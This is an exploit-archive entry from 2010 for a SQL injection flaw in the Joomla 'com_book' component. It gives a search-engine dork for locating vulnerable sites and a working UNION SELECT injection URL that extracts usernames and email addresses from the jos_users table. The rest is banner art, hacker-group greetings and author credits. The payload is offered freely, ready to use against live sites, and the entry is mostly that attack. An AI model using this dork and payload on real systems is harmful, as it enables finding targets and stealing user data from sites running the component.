Joomla! Component com_book - SQL Injection

EDB-ID:

11213

CVE:

N/A


Platform:

PHP

Published:

2010-01-21

==============================================================================
                      _      _       _          _      _   _ 
                     / \    | |     | |        / \    | | | |
                    / _ \   | |     | |       / _ \   | |_| |
                   / ___ \  | |___  | |___   / ___ \  |  _  |
   IN THE NAME OF /_/   \_\ |_____| |_____| /_/   \_\ |_| |_|
                                                             

==============================================================================
        [»] ~ Note : : <3 v4sploiter
==============================================================================
        [»] Joomla (com_book) SQL injection Vulnerability 
==============================================================================

	[»] Script:             [ Joomla Comp ]
	[»] Language:           [ PHP ]
    [»] Dork:               [ inurl:"com_book" ]
	[»] Founder:            [ Evil-Cod3r ]
    [»] Gr44tz:             [ v4sploiter - Mr.SaFa7 - Red Virus - Mn7os - Recruit ='( ]
    [»] Team:               [ v4-Team.com/cc ]
    [»] Price:              [ Free ]
###########################################################################

http://localhost/path/index.php?option=com_book&controller=listtour&task=showTour&cid[]=Exploit

 Exploit : -

index.php?option=com_book&controller=listtour&task=showTour&cid[]=-1 union all select 1,concat(username,0x3a,email),3,4,5,6,7,8,9,10 from jos_users-- 


Author: Evil-Cod3r

###########################################################################